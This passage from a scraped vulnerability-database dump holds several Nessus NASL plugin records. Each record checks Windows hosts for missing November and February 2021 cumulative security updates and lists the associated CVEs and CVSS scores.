\"CVE-2021-42288\"\n );\n script_xref(name:\"MSKB\", value:\"5007189\");\n script_xref(name:\"MSFT\", value:\"MS21-5007189\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n 
script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n\n script_name(english:\"KB5007189: Windows 10 Version 1909 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007189.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42275,\n CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42280, CVE-2021-42283,\n CVE-2021-42285)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-41356,\n CVE-2021-42284)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007189\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007189.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007189');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'18363',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007189])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:01", "description": "The remote Windows host is missing security update 5007192.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2021-38666, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42278, CVE-2021-42280, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007192: Windows 10 Version 1607 and Windows Server 2016 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007192.NASL", "href": "https://www.tenable.com/plugins/nessus/154990", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154990);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007192\");\n script_xref(name:\"MSFT\", value:\"MS21-5007192\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007192: Windows 10 Version 1607 and Windows Server 2016 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007192.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-38666,\n CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42278, CVE-2021-42280,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007192\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007192.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007192');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'14393',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007192])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:12", "description": "The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24078, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. 
(CVE-2021-1731, CVE-2021-24082)", "cvss3": {}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601345.NASL", "href": "https://www.tenable.com/plugins/nessus/146337", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146337);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601345\");\n script_xref(name:\"MSFT\", value:\"MS21-4601345\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24078,\n CVE-2021-24081, CVE-2021-24083, CVE-2021-24088,\n CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/office/february-9-2021%e2%80%94kb4601345-os-build-17763-1757-c38b7b85-0d84-d979-1a29-e4ba97b82042?ui=en-US&rs=en-US&ad=US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0231130\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601345.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601345');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n 
rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601345])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:59:47", "description": "The remote Windows host is missing security update. See Vendor Advisory for KB5007205", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007205: Windows 2022 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007205.NASL", "href": "https://www.tenable.com/plugins/nessus/154994", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154994);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007205\");\n script_xref(name:\"MSFT\", value:\"MS21-5007205\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007205: Windows 2022 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update. 
See\nVendor Advisory for KB5007205\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007205\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5007205.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007205');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'20348',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007205])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:59:47", "description": "The remote Windows host is missing security update 5007206.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42278, CVE-2021-42280, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007206: Windows 10 Version 1809 and Windows Server 2019 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42288", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": 